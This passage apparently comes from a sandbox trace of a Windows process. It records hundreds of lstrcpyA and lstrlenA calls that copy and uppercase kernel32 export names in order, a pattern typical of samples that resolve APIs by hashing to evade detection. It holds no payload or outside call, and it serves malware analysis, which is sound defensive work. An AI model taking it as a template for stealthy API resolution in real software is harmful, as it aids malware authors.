37 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.970] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.970] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.970] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.970] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.970] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.970] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.970] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.970] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.970] lstrlenA (lpString="BEEP") returned 4 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.970] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.970] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.970] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.970] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.971] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.971] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.971] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.971] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.971] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.971] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.971] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.971] lstrlenA (lpString="CANCELIO") returned 8 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.971] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.971] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.971] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.971] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.971] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.971] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.971] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.971] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.971] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.971] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.971] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.972] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.972] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.972] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.972] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.972] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.972] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.972] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.972] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.972] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.972] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.972] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.972] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.972] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.972] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.972] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.972] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.972] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.972] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.972] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.973] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.973] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.973] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.973] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.973] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.973] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.973] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.973] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.973] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.973] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.973] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.973] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.973] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.973] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.973] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.973] lstrlenA (lpString="COPYFILEA") returned 9 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.973] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.973] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.973] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.974] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.974] lstrlenA (lpString="COPYFILEW") returned 9 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.974] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.974] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.974] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.974] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.974] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.974] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.974] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.974] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.974] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.974] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.974] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.974] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.974] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.974] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.974] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.974] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.975] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.975] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.975] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.975] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.975] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.975] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.975] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.975] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.975] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.975] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.975] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.975] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.975] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.975] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.975] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.975] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.975] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.975] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.975] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.976] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.976] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.976] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.976] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.976] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.976] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.976] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.976] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.976] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.976] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.976] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.976] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.976] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.976] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.976] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.976] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.976] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.976] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.976] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") 